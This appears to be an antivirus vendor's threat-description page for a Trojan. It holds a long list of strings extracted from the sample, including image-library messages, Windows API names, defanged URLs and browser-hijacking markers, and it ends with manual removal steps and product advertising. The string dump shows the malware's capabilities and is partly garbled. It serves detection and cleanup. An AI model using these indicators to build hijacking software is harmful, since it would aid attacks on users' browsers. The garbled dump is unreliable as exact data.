.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
NULL row buffer for row %ld, pass %d
libpng error: %s
libpng warning: %s
Unknown zTXt compression type %d
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
%s: Cannot open
%s: Write error at scanline %lu
%s: Seek error at scanline %lu
%u: Sample out of range, max %u
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%f: Bad value for "%s"
%s: Invalid %stag "%s" (not supported by codec)
TIFFVSetField ... pass by value not imp.
%ld: Bad value for "%s"
%d: Bad value for "%s"
Nonstandard tile length %d, convert file
Nonstandard tile width %d, convert file
Bad value %ld for "%s" tag ignored
%s: Invalid InkNames value; expecting %d names, found %d
TIFFVGetField ... pass by value not imp.
Sorry, can not handle images with %d-bit samples
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, LogL data must have %s=%d
Sorry, can not handle separated image with %s=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle YCbCr images with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Missing needed %s tag
Sorry, can not image with %d-bit samples
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Sample %d out of range, max %u
Internal error, unknown tag 0x%x
Tag %d
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: Data buffer too small to hold tile %ld
%s: No space for data buffer at scanline %ld
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is no longer implemented due to Unisys patent enforcement
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
Compression algorithm does not support random access
Bogus "%s" field, ignoring and calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
wrong data type %d for "%s"; tag ignored
unknown field with tag %d (0x%x) encountered
No space %s
TIFF directory is missing required "%s" field
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %lu)
Cannot handle different per-sample values for field "%s"
cannot read TIFF_ANY type %d for field "%s"
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Error writing data for field "%s"
%s: Error writing SubIFD directory link
%s compression support is not configured
?%s: No space for LogLuv state block
Inappropriate photometric interpretation %d for SGILog compression; %s
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for state block
%s: Bad code word at scanline %d (x %lu)
%s: %s at scanline %d (got %lu, expected %lu)
%s: Premature EOF at scanline %d (x %lu)
%s: No space for Group 3/4 reference line
%s: No space for Group 3/4 run arrays
%s: Uncompressed data (not supported) at scanline %d (x %lu)
Fax SubAddress: %s
(%u = 0x%x)
%suncompressed data
%sEOL padding
%s2-d encoding
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
PackBitsDecode: discarding %d bytes to avoid buffer overrun
LZWDecode: Not enough data at scanline %d (short %d bytes)
LZWDecode: Strip %d not terminated with EOI code
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %d bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
"Predictor" value %d not supported
%u (0x%x)
right-curly-bracket
left-curly-bracket
0123456789
hXXp://app.baidu.com/app/enter?appid=219431
hXXp://app.baidu.com/app/enter?appid=117202
hXXp://app.baidu.com/app/enter?appid=116462
hXXp://app.baidu.com/app/enter?appid=126743
hXXp://app.baidu.com/app/enter?appid=229402
hXXp://qq.eoool.com/QQCeSuan/YuanAsk.aspx
hXXp://webPTF.bbs.hnol.net/dysr/201001/CCTV_very/CNTV_20100802.htm
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetWindowsDirectoryA
WinExec
GetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyboardState
keybd_event
VkKeyScanExA
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetOpenUrlA
Url(1
YHttp
.rsrch-lp
MedalWall.tpc
CBrowserMedal::GetQQBrowserInstallURL
QQBrowserUrl
MedalWall_QQBrowser_Url
\QQBrowser.exe
:%d, ptrBrowserProtect->LockBrowser
,GetLastErrror=%d
-module=Assistant.dll -installandsetdefaultbrowser
QQBrowser.exe
\QBUtils.dll
SogouExplorer.exe
Recv Notify ID= %d
Error: export function is null
Msg: call QCK.dll ok
Error: m_bckLoad.InitLoad Error
CIMEMedal::GetSogouIMEInstallURL
SogouIMEUrl
MedalWall_SogouIME_Url
CMedalWall::GetMedalWallURL
MedalWall_Default_Url
CMedalWall::NotifyMedalDataChangeToWebAndCheckMedalSituation
webkit
MedalWall.xml|MedalWall
:%s, GetLastErrror:%x
QMInterface.dll
, hr:%x
, GetLastErrror:%x
, return:%d
:nResult:%d
, result:%d
:%d ms
QQNav_Url
QQNav_Domain_Url
:%d,ptrMainPageProtect->QueryLockedMainPage
:%d,ptrMainPageProtect->LockMainPage
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\
sogouexplorer.exe
QQPCMgr\DetectPCMgrDllEx.dll
QQPCRtp.exe
QMPacket.dat
QQPCTray.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360
6.4.12582.0
mscoree.dll
3.93.0
RAR %s
(c) 1993-%d Alexander Roshal %d %s %d
UNRAR %s
(c) 1993-%d Alexander Roshal
>*1000 [*1024, *1]
RAR %d.%d
%s...
%d %s
-------- - %s %d,
: 0xx
%s ID
: %c%c%c%c ;
: %c%c%c%c
: %s -
.bcdeghijklmnopqrstuvwxyz
..XXeeOO--
0066//!!
!!$$$$!! ""&&))(($$
>>&&::22
**;;??33##
--5533  $$##$$##
%wFFNNOOOOSS]]jjssvvxx~~
$$(((())--//**
..CCFF//
##//8822
''..EEmm
hhWWTT__llppgg[[UUVVTTGG22!! ..??FFAA996699;;996677@@LLUUYYXXSSHH66$$
%ÌYYXXEE22//<<NNXXWWRRNNLLFF<<11--11::BBFFHHKKLLIIAA;;??OO``gg``RRHHGGLLMMGG==88<<EEIIFF==33((
!!&&))''""
!!&&((%%
%Ýee
]]@@44--##
__))..||
..qqWW
))004433//))##
##''  //2222//((
Curlz MT
Webdings
\imeconfig.exe
--plugin-reload=screenshot --Hotkey=A
HISNAPEVENT_{37D8B288-229F-4e33-90D7-84C45C5B7542}
sample_snap.png
SYSTEM\CurrentControlSet\Control\Keyboard Layouts
bdbugreport_%u
\bugreport.exe
"%s" --smname=%s
ConvertStringSecurityDescriptorToSecurityDescriptorW Failed[X]
GetSecurityDescriptorSacl Failed[X]
SetSecurityDescriptorSacl Failed[X]
SetSecurityDescriptorDacl[X]
SetEntriesInAcl[X]
AllocateAndInitializeSid failed! AllPackages[X]
AllocateAndInitializeSid failed! EveryoneSID[X]
SetSecurityDescriptorDacl Failed[X]
InitializeSecurityDescriptor Failed[X]
"class" : %d,
"content" : %s,
"pid" : %d,
"pname" : "%s",
"tid" : %d,
"time" : "%d-%d-%d %d:%d:%d.%d"
\uX
\Plugin\Screenshot\Config.ini
%s (*%s)
bd_screen_snapshot_30E90733-438F-423b-AA0D-1B9F244415DE
bd_screen_snapshot_64A7509A-4E98-4b5f-9BE9-7312A51A3C1A
BaiduShurufa_%d-%d-%d_%d-%d-%d
ReportToFile CreateFile Filed
ReportToFile ReadFile Filed
ReportToFile CryptDecrypt_AesEcb Filed
%d_%d_%d_%d_%d_%d_%d
ReportToFile new Failed
ReportToFile CryptEncrypt_AesEcb Failed
ReportToFile WriteFile Failed
%s\*.*
%s\%s
CreateFile [%s] Failed [X]
CreateFile [%s][08X]
[LoadFile]GetFileSize Failed[%s][08X]
[LoadFile]ReadFile Failed[%s][%d][X]
CreateDirectory[%s] Failed [X]
RGB:(%d,%d,%d)
6.5.12728.0
!"#$%&'()* ,-./0123456789:;<=>?@
For more information visit hXXp://VVV.zlib.net/
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant
1.0.0.0
E-mail:306189440@qq.com
SpeedUP.sys
5.2.3790.0 built by: dnsrv_dev(v-smgum)
empty.exe
Windows
Operating System
5.2.3790.0
&'()* ,-./
$&(*,-/14
(*.*)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (393 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 4.6 (9 votes)

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now